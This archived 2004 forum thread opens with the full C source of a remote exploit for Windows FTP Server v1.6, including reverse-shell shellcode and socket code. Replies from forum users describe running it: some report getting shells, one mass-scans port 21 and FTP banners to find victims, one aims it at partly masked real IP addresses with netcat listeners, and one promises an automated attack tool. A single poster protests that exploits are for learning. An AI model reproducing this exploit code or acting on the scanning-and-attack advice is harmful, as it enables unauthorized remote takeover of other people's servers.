Poc Exploit For Windows Ftp Server V1.6

Full Version: Poc Exploit For Windows Ftp Server V1.6

GovernmentSecurity.org > The Archives > Public Downloads

Wolfman

Jan 13 2004, 06:50 PM

QUOTE

/*

date: 12 janv 2004
subject: PoC exploit for Windows Ftp Server v1.6
vendor: http://srv.nease.net
credits: Peter Winter-Smith for the bug discovery
shellcode: reverse shell (~ 200 bytes)
notes: universal (doesn't rely on NT version), 2nd version of this exploit
greets: rosecurity team
author: mandragore, sploiting@mandragore.solidshells.com

*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>

unsigned char sc[]={
// some padding
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,
// restore patched code in MFC42.DLL so it doesn't crash yet
0xBF,0x2B,0x38,0x40,0x5F,0x66,0xB8,0x53,0x8B,0x66,0xAB,0x47,0x66,0xB8,0x40,0xB1,
0x66,0xAB,
// overoptimised reverse shell relying on offsets in the WinFTPServer.exe's IAT
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB7,0x80,0x36,0x96,0x46,0xE2,0xFA,

0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x1A,0x06,0xD7,

0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0x06,0x06,

0xD7,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,

0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,

0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0x14,0x1D,0x52,0xFC,0x86,

0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,

0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,

0xAA,0xB2,0x50,0x91,0xD2,0xF0,0x51,0xD1,0xBA,0x97,0x97,0x1F,0xC9,0xAE,0x1F,0xC9,

0xAA,0x1F,0xC9,0xD6,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,

0xF5,0xFB,0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,

0xC6,0xE4,0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,

0x9A,0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46};

void usage(char *argv0) {
printf("usage: %s -d <ip_dest> [options]\n",argv0);
printf("options:\n");
printf(" -h ip_host for the reversed shell (default 127.0.0.1)\n");
printf(" -p port for the reversed shell (default 80)\n\n");
exit(1);
}

int main(int argc, char **argv) {
struct sockaddr_in saddr;
#define port 21
int target=0, lhost=0x0100007f;
int lport=80;
int where=0x5f40382b;
int val1=0xc283, val2=0xe2ff;
int delta=0x11eeca8-0x11ee96c;
char *buff;
int s, ret, i;

printf("[%%] winftpserv v1.6 sploit by mandragore (v2)\n");

if (argc<2) {
usage(argv[0]);
}

while((i = getopt(argc, argv, "d:h:p:"))!= EOF) {
switch (i) {
case 'd':
target=inet_addr(optarg);
break;
case 'h':
lhost=inet_addr(optarg);
break;
case 'p':
lport=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}

if ((target==-1) || (lhost==-1))
usage(argv[0]);

printf("[.] if working you'll have a shell on %s:%d .\n",inet_ntoa(*(struct in_addr *)&lhost),lport);
printf("[.] launching attack on %s..\n",inet_ntoa(*(struct in_addr *)&target));

lport=lport ^ 0x9696;
lport=(lport & 0xff) << 8 | lport >>8;
memcpy(sc+17+18+0x5a,&lport,2);

lhost=lhost ^ 0x96969696;
memcpy(sc+17+18+0x53,&lhost,4);

buff=(char *)malloc(4096);
bzero(buff,4096);

memcpy(buff,&where,4);
strcat(buff,"xyzy");
where+=3;
memcpy(buff+8,&where,4);

strncat(buff,sc,strlen(sc));

for (i=0;i<(delta-1)/4;i++) {
strcat(buff,"%08x");
}

sprintf(buff,"%s%%0%dx%%hn%%0%dx%%hn\r\n",buff,val1-strlen(sc)-((delta-1)/4)*8-4*3-7,val2-val1);

saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = target;
saddr.sin_port = htons(port);

s=socket(2,1,6);

ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
if (ret==-1) {
perror("[-] connect()");
exit(1);
}

send(s,buff,strlen(buff),0);

recv(s,buff,1024,0);

close(s);

printf("[+] done.\n");

exit(0);
}

h:\>soft.exe
[%] winftpserv v1.6 sploit by mandragore (v2)
usage: soft -d <ip_dest> [options]
options:
-h ip_host for the reversed shell (default 127.0.0.1)
-p port for the reversed shell (default 80)

I'v not tested it because i dont know how to scan for this specific ftp server, and since the are billions of ftp servers out there ....

clip

Jan 13 2004, 06:53 PM

Try my banner scanner a few posts down

cyrixx

Jan 13 2004, 08:19 PM

thhhhx for the tools! try it!

BlueSkydrei

Jan 13 2004, 08:21 PM

THX, i´ll test it ;-)

Xenos

Jan 13 2004, 09:08 PM

It will be tested for sure

Thanks man

BlueSkydrei

Jan 13 2004, 09:35 PM

Works very well, got root shell.

Test OS: Windows XP SP1

I´ll post an auto hacker in a few minutes.

Test24

Jan 13 2004, 09:36 PM

but how you scan for this witch port thanks

vnet576

Jan 13 2004, 09:58 PM

Confirmed..works on XP sp0 as well. Test24...look at the code and u will see what port is used.

Test24

Jan 13 2004, 10:23 PM

port 21 or port 80 ???

vnet576

Jan 13 2004, 10:26 PM

QUOTE (Test24 @ Jan 13 2004, 05:23 PM)

port 21 or port 80 ???

well at least u looked at the code this time

#define port 21 (thats the port u scan for)

80 is the reverse port.

Test24

Jan 13 2004, 10:29 PM

ok thanks a lot

Axl

Jan 14 2004, 10:24 AM

what is the banner of Windows Ftp Server V1.6 ???

larsbruggie

Jan 14 2004, 01:01 PM

thnx a lot, lets hope it works

Max_Payne

Jan 14 2004, 02:53 PM

this is definately something to be worth testing..thanks dude..gonna see if it runs under win2k sp4

yeyo

Jan 15 2004, 09:11 AM

Thanks a lot 4 the xploit man

lets try it

---

Don't worl at W2K SP4

lets try it at my XP boc

Trepet

Jan 15 2004, 05:59 PM

Yeah too bad it does not work on Windows 2000

react0r

Jan 15 2004, 07:17 PM

CODE

C:\>soft -d 213.100.12.*** -p 5050
[%] winftpserv v1.6 sploit by mandragore (v2)
[.] if working you'll have a shell on 127.0.0.1:5050 .
[.] launching attack on 213.100.12.192..
[+] done.

CODE

C:\>soft -d 213.100.1.*** -p 5050
[%] winftpserv v1.6 sploit by mandragore (v2)
[.] if working you'll have a shell on 127.0.0.1:5050 .
[.] launching attack on 213.100.1.208..
[+] done.

and nuthing happens!
what i should do?
PS
btw i started with Nc -l -vv -p 5050
..

blackP0ster

Jan 15 2004, 07:52 PM

hm..i've installed "windows ftp server 1.6" on my home pc and hacked it in my lan.

worked out well!!! and i have win2k..!
the ftp server crashes and you get a shell..!

nice exploit

black

BLaCkOuT

Jan 15 2004, 08:42 PM

thnx a lot

react0r

Jan 15 2004, 09:26 PM

why it doesnt work?!?!?!?!?!
what i should write in NC and what to do in the exploit?
i scanned alot of banners!

react0r

Jan 15 2004, 09:53 PM

what's the banner that i should search for this exploit?

Test24

Jan 15 2004, 09:56 PM

It doesn't work because there is not a lot of ips with this ftp so wait another exploit

s0v1v1d

Jan 16 2004, 06:07 AM

Shouldnt exploits be used to learn how not to be exploited by them?

QUOTE

It doesn't work because there is not a lot of ips with this ftp so wait another exploit

Realy man, come on .

oxygen007m

Jan 16 2004, 07:42 AM

thanks a lot wolfman !
lets try it if works !

Mephisto

Jan 16 2004, 02:05 PM

I dont understand this:

I have a few scans like this:
62.*.*.* 220 Microsoft FTP Service

After the scanning i start-up soft.exe like this:

C:\soft -d 62.*.*.* -h [My IP]
OR
C:\soft -d 62.*.*.*

After that i get

C:\>soft -d 62.*.*.*
[%] winftpserv v1.6 sploit by mandragore (v2)
[.] if working you'll have a shell on 127.0.0.1:80 .
[.] launching attack on 62.*.*.*..
[+] done.
OR
C:\>soft -d 62.*.*.* -h [MY IP]
[%] winftpserv v1.6 sploit by mandragore (v2)
[.] if working you'll have a shell on [MY IP]:80 .
[.] launching attack on 62.*.*.*..
[+] done.

But what do i have 2 do after that....
I tried the listening mode with Netcat:
NC -l -vv -p 80

But nothing helps....how in the world do i connect to the shell.

Many thnx
Mephisto

PSR

Jan 16 2004, 02:14 PM

thats cause the exploit aint made for microsoft ftp server but windwos ftp server . 2 different things man

derquakecommander

Jan 16 2004, 07:48 PM

i have installed v1.6 on my lan box and when i exploit the pc the ftp crashes only and no shell

Win2k SP 3

Thom

Jan 16 2004, 08:06 PM

react0r, it would be appriciated if you took the time to browse thru the forum rules before you make a statement.

If you actually did read them you would know that its forbidden to post real IPs.

Gotisch

Jan 16 2004, 08:27 PM

QUOTE

[.] if working you'll have a shell on [MY IP]:80

QUOTE

But what do i have 2 do after that....
I tried the listening mode with Netcat:
NC -l -vv -p 80

Uli

Jan 17 2004, 06:03 PM

Thanks for the tool
will try it

violator13

Jan 18 2004, 01:43 AM

thx! tested on win2k sp4 german.. it works! ftp server crashes and i get a shell

greetz

violator

derquakecommander

Jan 18 2004, 01:53 PM

the xploited pc is win24 sp4 or your pc?

kok

Jan 18 2004, 05:57 PM

very nice

BuzzDee

Jan 20 2004, 09:04 PM

i did a remote port scan on port 21. that gave me a file with about 10 mb. then i did a remote banner scan which gave me a log file with over 20 mb... i downloaded it searched for the right banner but there was NOT ONLY ONE windows ftp server scan....

is there something more 2 say?

...

raif

Jan 21 2004, 11:18 PM

using this exploit i can crash windows ftp like nobody's business, but i can't get a shell out of it

Thonyx

Jan 22 2004, 05:36 PM

QUOTE

It work

Work on Xp Sp0/Sp1
And 2k German

I'll test it

ThX

Tomjack2000

Jan 25 2004, 10:17 AM

Thankx for it i'll test it here

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.